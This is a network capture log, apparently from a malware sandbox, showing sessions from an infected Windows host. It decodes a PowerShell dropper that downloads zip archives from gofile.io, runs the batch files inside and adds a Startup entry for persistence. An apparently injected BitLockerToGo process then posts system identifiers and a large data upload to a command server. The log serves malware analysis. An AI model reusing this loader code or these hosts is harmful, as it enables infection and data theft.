2024-07-27 06:54:31 UTC	700	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:31 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2509 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZ4mhMDL9FJtyy%2B8XXPpObhk6SjXfubJ17hMEM3%2F0H7T%2BaSOY6WRnbQBfepM7IoHB8Cpn2zO%2B6WT09u69jVlSfk7fxMqPHjM1DwfSpjjHJHHU8TzJMAOh6MEeA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab7f48d24c41d-EWR
2024-07-27 06:54:31 UTC	669	IN	Data Raw: 24 75 72 6c 31 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 36 62 32 34 65 63 39 37 2d 32 61 38 64 2d 34 36 38 64 2d 61 32 34 64 2d 63 38 30 38 31 63 64 61 31 64 61 62 2f 76 6d 2e 7a 69 70 22 0d 0a 24 75 72 6c 32 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 30 36 35 36 63 35 63 66 2d 35 31 62 34 2d 34 66 61 34 2d 61 65 34 38 2d 38 65 65 35 65 64 33 64 31 34 32 65 2f 6c 6d 2e 7a 69 70 22 0d 0a 24 74 65 6d 70 44 69 72 31 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 20 22 45 78 74 72 61 63 74 65 64 56 65 6e 6f Data Ascii: $url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVeno
2024-07-27 06:54:31 UTC	1369	IN	Data Raw: 69 72 65 63 74 6f 72 79 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 73 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 64 69 72 65 63 74 6f 72 79 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 62 61 74 46 69 6c 65 20 69 6e 20 24 62 61 74 46 69 6c 65 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 63 6d 64 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2f 63 20 24 28 24 62 61 74 46 69 6c 65 2e 46 75 6c 6c 4e 61 6d 65 29 22 20 2d 57 6f 72 6b 69 6e 67 44 69 72 65 63 74 6f 72 79 20 24 64 69 72 65 63 74 6f 72 79 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 20 20 20 20 7d 0d Data Ascii: irectory ) $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File foreach ($batFile in $batFiles) { Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow }
2024-07-27 06:54:31 UTC	471	IN	Data Raw: 6c 65 73 49 6e 44 69 72 32 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 31 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 32 0d 0a 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 31 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 74 65 6d 70 44 69 72 31 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 46 69 72 73 74 20 31 0d 0a 20 20 20 20 69 66 20 28 24 62 61 74 46 69 6c 65 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 56 62 73 54 6f 53 74 61 72 74 75 70 20 2d 62 61 74 46 69 6c 65 50 61 Data Ascii: lesInDir2.Count -gt 0) { Run-BatFiles -directory $tempDir1 Run-BatFiles -directory $tempDir2 $batFile1 = Get-ChildItem -Path $tempDir1 -Filter *.bat -File \| Select-Object -First 1 if ($batFile1) { Add-VbsToStartup -batFilePa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50721	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:31 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: callosallsaospz.shop
2024-07-27 06:54:31 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
2024-07-27 06:54:32 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vftn01m1es50lf8m0l2a99tjnq; expires=Wed, 20-Nov-2024 00:41:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4gEcjnZvz3elcQyCao5SimY969AarKiEYl7EpghVuD8XwUsxLfxxe1UNwdwIQ19iXU6LySnCo0qgl0M6MG41%2Fd%2FqK%2FxxBKPmW6%2FAxBBXih0P7x%2BVT0Jv0MpOq3OXi39anfgvAC3GQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab7f8cc6a4386-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:32 UTC	557	IN	Data Raw: 34 64 62 0d 0a 78 6a 4c 79 38 53 4d 47 62 64 50 45 61 66 76 36 74 69 36 42 6f 59 52 34 72 65 6a 42 35 2b 47 47 55 6b 59 72 37 4a 69 58 76 63 36 39 45 49 54 54 47 54 4a 42 38 62 63 4d 32 63 44 43 58 50 54 45 71 46 72 4d 6a 4f 50 64 68 2b 63 2b 4e 55 37 41 75 75 48 51 37 50 78 55 6b 35 31 51 59 30 48 78 6f 52 48 5a 77 4f 31 56 6f 38 54 71 57 70 66 4b 70 49 32 44 35 7a 34 6b 53 6f 66 33 35 39 47 74 72 6c 36 56 6d 55 5a 6c 43 62 4b 6f 42 4a 36 66 30 30 2f 72 7a 2b 30 56 78 59 58 6a 79 38 50 6a 4b 47 51 52 7a 74 58 79 79 61 2b 4c 55 34 47 61 41 58 74 42 71 4f 59 4d 6c 64 69 4d 44 4f 44 45 35 68 54 4c 6a 4b 71 50 69 65 34 32 4a 55 2b 47 36 50 37 62 70 71 35 51 6c 70 68 4d 62 42 32 2f 6f 67 4f 56 6d 64 6c 50 6f 34 32 6d 48 64 66 4b 2b 38 58 51 31 6a 4d 31 57 4a Data Ascii: 4dbxjLy8SMGbdPEafv6ti6BoYR4rejB5+GGUkYr7JiXvc69EITTGTJB8bcM2cDCXPTEqFrMjOPdh+c+NU7AuuHQ7PxUk51QY0HxoRHZwO1Vo8TqWpfKpI2D5z4kSof359Gtrl6VmUZlCbKoBJ6f00/rz+0VxYXjy8PjKGQRztXyya+LU4GaAXtBqOYMldiMDODE5hTLjKqPie42JU+G6P7bpq5QlphMbB2/ogOVmdlPo42mHdfK+8XQ1jM1WJ
2024-07-27 06:54:32 UTC	693	IN	Data Raw: 32 4b 2b 32 45 71 57 51 54 32 6f 49 70 2b 59 55 31 34 47 55 53 2b 2b 44 76 6c 72 42 6a 36 79 58 67 76 59 31 4b 6c 75 43 2f 2f 50 53 72 36 70 51 6c 5a 52 4d 61 67 6d 32 70 51 4f 64 6d 64 70 41 36 63 44 69 47 59 2f 45 34 34 4b 62 70 47 68 6b 65 49 33 2b 38 73 32 76 71 68 43 50 33 56 67 6b 43 4c 33 6d 55 39 6d 53 30 6b 48 71 79 4f 45 53 77 35 69 6f 69 6f 44 74 4e 79 4a 44 6a 66 4c 2f 32 61 4b 6c 56 35 57 55 55 32 6f 45 76 4b 55 42 6e 39 69 61 44 4f 54 62 70 6b 4b 50 70 4b 43 55 6c 64 59 7a 4e 56 6a 4f 35 62 76 47 37 4b 4e 63 30 4d 73 42 62 51 65 2b 71 77 61 54 6c 74 46 42 36 73 4c 6e 46 38 6d 42 6f 6f 32 4c 34 44 63 6b 54 59 50 31 2b 39 2b 69 72 46 57 55 6d 55 67 6b 51 66 47 68 45 39 6e 41 6c 48 7a 75 7a 2b 30 57 6a 62 2b 67 69 34 33 6a 4a 6d 52 57 77 4f 4f Data Ascii: 2K+2EqWQT2oIp+YU14GUS++DvlrBj6yXgvY1KluC//PSr6pQlZRMagm2pQOdmdpA6cDiGY/E44KbpGhkeI3+8s2vqhCP3VgkCL3mU9mS0kHqyOESw5ioioDtNyJDjfL/2aKlV5WUU2oEvKUBn9iaDOTbpkKPpKCUldYzNVjO5bvG7KNc0MsBbQe+qwaTltFB6sLnF8mBoo2L4DckTYP1+9+irFWUmUgkQfGhE9nAlHzuz+0Wjb+gi43jJmRWwOO
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 33 64 34 35 0d 0a 46 61 51 43 34 72 77 4b 4c 6b 74 68 43 38 63 37 73 48 38 47 47 70 6f 71 44 35 54 45 71 51 34 57 36 75 35 2b 72 76 42 44 49 30 32 35 70 48 36 4f 73 41 49 6a 61 34 55 2f 74 7a 65 45 4d 6a 35 58 74 6e 4d 50 6a 50 47 51 52 7a 76 48 7a 30 36 43 6b 56 6f 4b 64 54 6e 59 46 6f 36 49 46 6e 5a 54 61 52 65 37 4d 34 77 6a 4c 69 72 47 45 68 75 4d 2b 4b 56 75 4c 75 72 75 66 71 37 77 51 79 4e 4e 37 55 41 69 68 74 77 7a 62 72 64 64 43 37 63 54 77 57 74 44 45 75 73 57 45 36 48 42 38 43 59 33 32 2b 4e 61 70 71 30 4b 61 6e 30 42 32 43 4c 69 76 41 5a 69 57 32 30 66 76 78 76 51 52 77 49 4b 73 68 49 37 70 4f 79 42 4a 7a 72 53 31 32 4c 54 6b 43 4e 43 79 54 47 73 64 73 72 64 4a 72 4a 76 61 51 75 54 56 70 67 57 42 6b 2b 4f 43 6a 36 52 6f 5a 45 69 43 39 76 54 51 Data Ascii: 3d45FaQC4rwKLkthC8c7sH8GGpoqD5TEqQ4W6u5+rvBDI025pH6OsAIja4U/tzeEMj5XtnMPjPGQRzvHz06CkVoKdTnYFo6IFnZTaRe7M4wjLirGEhuM+KVuLurufq7wQyNN7UAihtwzbrddC7cTwWtDEusWE6HB8CY32+Napq0Kan0B2CLivAZiW20fvxvQRwIKshI7pOyBJzrS12LTkCNCyTGsdsrdJrJvaQuTVpgWBk+OCj6RoZEiC9vTQ
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 65 59 53 6d 41 4c 73 61 73 41 6c 35 62 64 51 4f 76 50 34 51 6a 43 6a 36 75 50 69 75 45 38 4b 55 71 63 2b 66 53 66 34 75 52 58 69 4e 4d 5a 4a 43 69 43 6b 53 6a 5a 68 35 70 56 6f 38 54 71 57 70 66 4b 6f 6f 32 45 36 6a 51 32 52 35 7a 30 38 74 2b 71 72 46 69 58 6e 30 39 71 48 62 6d 6e 43 35 65 58 33 45 58 6e 77 75 49 65 77 34 33 6a 79 38 50 6a 4b 47 51 52 7a 74 4c 32 78 62 62 6d 66 70 75 54 52 6e 51 5a 71 75 59 55 31 34 47 55 53 2b 2b 44 76 6c 72 4c 67 61 6d 4d 67 4f 30 30 4b 55 6d 48 39 66 7a 58 6f 61 78 43 6b 5a 6c 54 59 41 71 77 71 51 47 64 6b 4e 68 44 37 38 66 30 45 59 2f 45 34 34 4b 62 70 47 68 6b 61 59 58 73 31 73 32 2b 35 45 2f 65 69 67 46 6a 41 2f 48 2b 53 35 43 55 31 55 33 70 78 65 30 66 77 6f 71 6d 6a 34 54 6f 4d 43 52 4b 69 50 7a 34 31 36 53 6f 58 Data Ascii: eYSmALsasAl5bdQOvP4QjCj6uPiuE8KUqc+fSf4uRXiNMZJCiCkSjZh5pVo8TqWpfKoo2E6jQ2R5z08t+qrFiXn09qHbmnC5eX3EXnwuIew43jy8PjKGQRztL2xbbmfpuTRnQZquYU14GUS++DvlrLgamMgO00KUmH9fzXoaxCkZlTYAqwqQGdkNhD78f0EY/E44KbpGhkaYXs1s2+5E/eigFjA/H+S5CU1U3pxe0fwoqmj4ToMCRKiPz416SoX
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 68 42 37 71 67 42 5a 69 65 32 45 47 6a 6a 61 59 64 31 38 72 37 78 61 54 2b 50 53 4a 65 6e 38 2f 79 33 2f 33 6b 54 39 36 4b 41 57 4d 44 38 66 35 4c 6c 4a 54 65 51 65 62 48 37 68 33 4d 69 36 2b 42 6a 75 6b 30 4c 55 32 4c 36 4f 66 5a 6f 71 52 66 6e 70 78 4e 64 67 47 30 70 67 66 5a 31 70 52 4c 2b 34 4f 2b 57 76 36 64 6f 38 57 63 71 69 6c 6b 54 6f 4b 36 72 5a 2b 6a 71 55 4b 63 6e 45 46 6c 44 4c 57 74 44 4a 2b 65 31 55 2f 6d 77 4f 4d 63 7a 6f 71 76 6a 34 54 73 4f 69 70 45 69 50 37 7a 32 65 7a 71 45 4a 65 4c 41 54 78 50 67 36 73 46 6b 4a 76 53 51 66 58 72 31 31 72 51 78 4c 72 46 68 4f 68 77 66 41 6d 4b 38 66 33 54 71 61 78 56 6b 5a 74 4c 62 41 43 2b 74 41 71 57 6b 64 4e 48 37 73 7a 6f 48 38 47 59 70 49 36 49 37 44 6b 71 54 38 36 30 74 64 69 30 35 41 6a 51 70 55 Data Ascii: hB7qgBZie2EGjjaYd18r7xaT+PSJen8/y3/3kT96KAWMD8f5LlJTeQebH7h3Mi6+Bjuk0LU2L6OfZoqRfnpxNdgG0pgfZ1pRL+4O+Wv6do8WcqilkToK6rZ+jqUKcnEFlDLWtDJ+e1U/mwOMczoqvj4TsOipEiP7z2ezqEJeLATxPg6sFkJvSQfXr11rQxLrFhOhwfAmK8f3TqaxVkZtLbAC+tAqWkdNH7szoH8GYpI6I7DkqT860tdi05AjQpU
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 72 67 2b 58 69 74 56 44 6f 34 32 6d 48 64 66 4b 2b 38 57 79 38 6a 63 6a 52 73 7a 54 38 73 53 74 72 6c 4f 62 6e 77 46 37 51 61 6a 6d 44 4a 58 59 6a 41 7a 75 7a 2b 73 65 33 59 61 6a 68 59 72 6a 4f 6a 5a 47 67 66 66 32 33 36 6d 32 55 59 4b 63 53 6d 45 4d 74 61 6b 45 6c 5a 44 65 44 4b 32 44 34 51 4b 50 30 75 4f 70 67 50 55 36 5a 6d 36 55 37 50 4c 54 76 61 39 64 6e 4e 4e 65 4b 68 62 78 6f 51 66 5a 77 4a 52 4d 34 73 37 30 48 38 36 41 71 59 69 4c 36 7a 55 68 52 6f 72 2b 2f 74 47 2b 71 6c 2b 51 6c 55 70 6c 43 72 4b 74 41 5a 65 52 78 67 79 74 67 2b 45 43 6a 39 4c 6a 72 35 6a 6c 50 53 67 4c 6f 50 48 6a 32 4f 36 46 58 70 75 55 54 58 4a 50 72 75 67 53 32 5a 2f 59 44 4c 75 44 37 78 54 44 69 61 53 4e 69 2b 45 77 4c 30 6d 42 38 50 76 59 76 71 35 63 6d 6f 46 4f 5a 77 4b Data Ascii: rg+XitVDo42mHdfK+8Wy8jcjRszT8sStrlObnwF7QajmDJXYjAzuz+se3YajhYrjOjZGgff236m2UYKcSmEMtakElZDeDK2D4QKP0uOpgPU6Zm6U7PLTva9dnNNeKhbxoQfZwJRM4s70H86AqYiL6zUhRor+/tG+ql+QlUplCrKtAZeRxgytg+ECj9Ljr5jlPSgLoPHj2O6FXpuUTXJPrugS2Z/YDLuD7xTDiaSNi+EwL0mB8PvYvq5cmoFOZwK
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 4a 48 5a 51 75 76 52 35 56 71 42 79 71 53 64 77 37 78 77 46 6b 4f 4e 39 75 50 53 6f 2b 52 50 33 6f 6f 42 59 77 50 78 2f 6b 75 4c 69 74 52 48 34 38 54 6f 43 4d 36 43 72 49 2b 44 34 6a 73 75 53 6f 66 2b 2b 39 61 71 70 56 32 52 6b 6b 46 68 44 37 69 30 42 74 6e 57 6c 45 76 37 67 37 35 61 2b 49 61 6f 74 49 44 79 63 44 73 48 6c 37 72 79 30 2b 7a 38 45 4a 47 42 54 47 77 4c 73 61 73 4e 6b 70 6e 56 54 2b 50 44 35 52 72 4b 67 61 79 44 68 4f 6b 36 4c 55 43 63 38 76 48 4e 72 4b 68 55 30 4e 30 42 59 78 66 78 2f 6b 75 70 6d 39 39 41 34 38 37 7a 57 74 44 45 75 73 57 45 36 48 42 38 43 59 62 78 2f 74 6d 6e 70 31 4f 65 6d 45 74 72 41 4c 75 67 44 5a 47 64 31 45 44 6a 78 75 41 65 79 34 53 6b 69 34 37 6c 49 69 64 41 7a 72 53 31 32 4c 54 6b 43 4e 43 7a 53 6e 49 4b 74 72 42 4a Data Ascii: JHZQuvR5VqByqSdw7xwFkON9uPSo+RP3ooBYwPx/kuLitRH48ToCM6CrI+D4jsuSof++9aqpV2RkkFhD7i0BtnWlEv7g75a+IaotIDycDsHl7ry0+z8EJGBTGwLsasNkpnVT+PD5RrKgayDhOk6LUCc8vHNrKhU0N0BYxfx/kupm99A487zWtDEusWE6HB8CYbx/tmnp1OemEtrALugDZGd1EDjxuAey4Ski47lIidAzrS12LTkCNCzSnIKtrBJ
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 7a 31 67 37 35 49 67 63 71 78 78 64 75 6b 64 79 64 62 6e 50 7a 32 79 61 2f 6a 62 71 36 7a 53 6d 67 4d 76 61 63 4d 32 64 61 55 51 36 4f 62 33 31 72 4d 6d 4c 48 4b 6b 76 49 39 4e 45 37 43 38 75 54 53 6f 4f 51 65 30 4e 39 46 62 77 4f 30 6f 52 76 57 69 73 52 48 37 39 57 71 48 74 33 4b 37 63 57 53 37 7a 38 32 52 34 6d 31 35 4d 6d 68 74 46 4f 56 6c 41 31 73 48 72 79 71 53 39 66 59 77 55 66 76 78 65 73 50 67 4a 75 31 68 70 58 6a 66 43 78 59 67 2f 61 31 34 4f 4c 6b 53 4e 44 4c 41 56 45 4d 76 36 67 4d 6a 34 6d 5a 62 4f 6a 50 35 52 62 4f 6a 65 50 4c 77 2b 4a 77 66 42 72 41 75 76 48 4f 37 50 77 41 77 73 67 55 4e 31 6a 68 39 42 54 58 67 5a 52 61 6f 35 75 30 56 49 2b 59 34 39 33 44 6f 7a 4d 32 57 34 6a 35 34 39 7a 72 6d 6d 36 52 6e 6b 34 6f 41 62 71 6d 44 49 6d 4f 7a Data Ascii: z1g75IgcqxxdukdydbnPz2ya/jbq6zSmgMvacM2daUQ6Ob31rMmLHKkvI9NE7C8uTSoOQe0N9FbwO0oRvWisRH79WqHt3K7cWS7z82R4m15MmhtFOVlA1sHryqS9fYwUfvxesPgJu1hpXjfCxYg/a14OLkSNDLAVEMv6gMj4mZbOjP5RbOjePLw+JwfBrAuvHO7PwAwsgUN1jh9BTXgZRao5u0VI+Y493DozM2W4j549zrmm6Rnk4oAbqmDImOz
2024-07-27 06:54:32 UTC	1369	IN	Data Raw: 48 45 4e 2b 48 72 49 4b 39 32 67 63 31 54 70 36 34 30 39 79 36 70 78 44 65 30 31 6b 6b 56 2f 47 48 41 59 6d 56 32 30 75 6a 33 4b 67 44 6a 35 7a 6a 33 64 43 71 63 44 59 4a 31 72 71 79 30 61 47 6c 55 35 36 51 55 33 59 4a 73 72 41 49 33 71 62 71 61 65 37 4f 34 78 54 49 74 4a 32 6b 69 66 51 39 4b 30 37 4d 32 76 4c 4a 72 35 70 75 70 34 4a 47 64 45 32 58 70 52 32 61 32 4a 6f 4d 2b 34 4f 2b 57 75 36 41 73 34 69 4d 34 33 49 45 54 70 6a 35 74 63 44 69 76 52 43 47 30 78 6b 33 51 66 47 30 53 38 48 59 6b 30 2f 78 30 65 41 5a 32 59 6e 6b 75 37 33 4a 49 69 4e 5a 6a 62 6a 45 30 71 69 79 52 5a 4f 44 52 6c 6f 78 6e 4c 51 4d 69 5a 75 57 66 66 58 41 35 68 54 49 79 75 33 46 6d 36 52 6f 5a 47 53 63 2f 65 58 63 37 4c 73 65 69 64 4e 58 4a 46 66 69 36 45 75 4c 32 49 77 4d 70 4d Data Ascii: HEN+HrIK92gc1Tp6409y6pxDe01kkV/GHAYmV20uj3KgDj5zj3dCqcDYJ1rqy0aGlU56QU3YJsrAI3qbqae7O4xTItJ2kifQ9K07M2vLJr5pup4JGdE2XpR2a2JoM+4O+Wu6As4iM43IETpj5tcDivRCG0xk3QfG0S8HYk0/x0eAZ2Ynku73JIiNZjbjE0qiyRZODRloxnLQMiZuWffXA5hTIyu3Fm6RoZGSc/eXc7LseidNXJFfi6EuL2IwMpM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50722	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:32 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:32 UTC	1267	OUT	Data Raw: 67 34 6a 37 5a 54 61 57 53 63 35 42 79 4c 47 68 37 70 77 55 4b 2f 38 65 50 58 35 62 4f 2b 55 53 39 58 4c 62 31 6c 2b 66 45 78 47 71 73 77 45 68 79 73 77 2f 45 66 79 34 73 2b 6b 2b 56 70 30 67 30 56 4d 57 67 43 64 62 65 6f 39 6c 43 69 55 41 69 77 4d 41 4d 45 45 45 74 7a 72 71 73 64 79 43 42 44 71 4d 66 31 43 57 79 62 2b 77 58 37 32 73 6c 36 47 2b 47 42 4d 55 54 42 62 55 36 6b 6b 66 4b 79 55 6b 6e 77 35 7a 62 4d 6d 31 35 4f 63 51 57 58 78 65 4c 66 31 2f 34 4c 75 66 70 39 6f 4a 42 31 53 59 79 78 72 73 64 48 74 46 77 63 63 50 76 72 61 4b 49 71 51 75 5a 6c 61 52 4f 6b 77 4b 30 44 61 70 46 6a 46 31 56 43 38 41 64 4e 67 78 63 35 64 6d 63 78 74 62 37 43 4c 67 43 32 4c 32 38 6a 68 4b 7a 2f 7a 2b 43 6d 75 49 4b 7a 7a 73 75 6d 4a 75 53 4b 30 39 4c 4f 38 75 61 46 50 Data Ascii: g4j7ZTaWSc5ByLGh7pwUK/8ePX5bO+US9XLb1l+fExGqswEhysw/Efy4s+k+Vp0g0VMWgCdbeo9lCiUAiwMAMEEEtzrqsdyCBDqMf1CWyb+wX72sl6G+GBMUTBbU6kkfKyUknw5zbMm15OcQWXxeLf1/4Lufp9oJB1SYyxrsdHtFwccPvraKIqQuZlaROkwK0DapFjF1VC8AdNgxc5dmcxtb7CLgC2L28jhKz/z+CmuIKzzsumJuSK09LO8uaFP
2024-07-27 06:54:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:33 UTC	685	IN	Data Raw: 57 4f 2f 58 47 54 5a 72 56 39 33 77 55 72 72 33 49 53 30 4c 63 6f 5a 6a 76 76 56 45 53 4e 6c 71 38 55 4c 79 6d 2b 68 75 4b 77 68 39 49 4b 43 6b 41 33 4a 59 61 38 58 63 6c 34 35 31 6e 36 67 4f 75 67 76 48 58 32 65 71 2f 6f 4d 47 59 4c 63 74 41 4b 49 61 30 78 6c 62 2f 66 58 41 30 57 6a 31 57 79 4f 78 76 51 36 70 48 34 6a 47 57 79 71 43 66 57 33 78 58 37 6e 49 54 31 78 43 41 6a 58 71 66 30 32 69 78 70 69 35 39 32 46 76 41 78 31 4b 32 68 67 78 5a 54 79 55 75 45 4a 57 53 50 70 45 45 74 73 72 61 4d 72 35 58 44 44 69 67 75 4b 48 56 78 5a 73 34 4f 35 72 51 59 4b 64 51 47 4e 74 45 7a 67 48 43 2f 66 62 54 4b 36 6b 66 46 30 38 69 64 4e 4f 7a 62 71 48 6f 52 56 4a 69 75 43 41 6e 42 6e 48 66 59 41 61 4b 36 59 79 69 61 5a 32 6e 77 55 50 6e 74 68 76 74 2f 51 73 33 73 58 Data Ascii: WO/XGTZrV93wUrr3IS0LcoZjvvVESNlq8ULym+huKwh9IKCkA3JYa8Xcl451n6gOugvHX2eq/oMGYLctAKIa0xlb/fXA0Wj1WyOxvQ6pH4jGWyqCfW3xX7nIT1xCAjXqf02ixpi592FvAx1K2hgxZTyUuEJWSPpEEtsraMr5XDDiguKHVxZs4O5rQYKdQGNtEzgHC/fbTK6kfF08idNOzbqHoRVJiuCAnBnHfYAaK6YyiaZ2nwUPnthvt/Qs3sX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50723	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:33 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: callosallsaospz.shop
2024-07-27 06:54:33 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 06:54:33 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 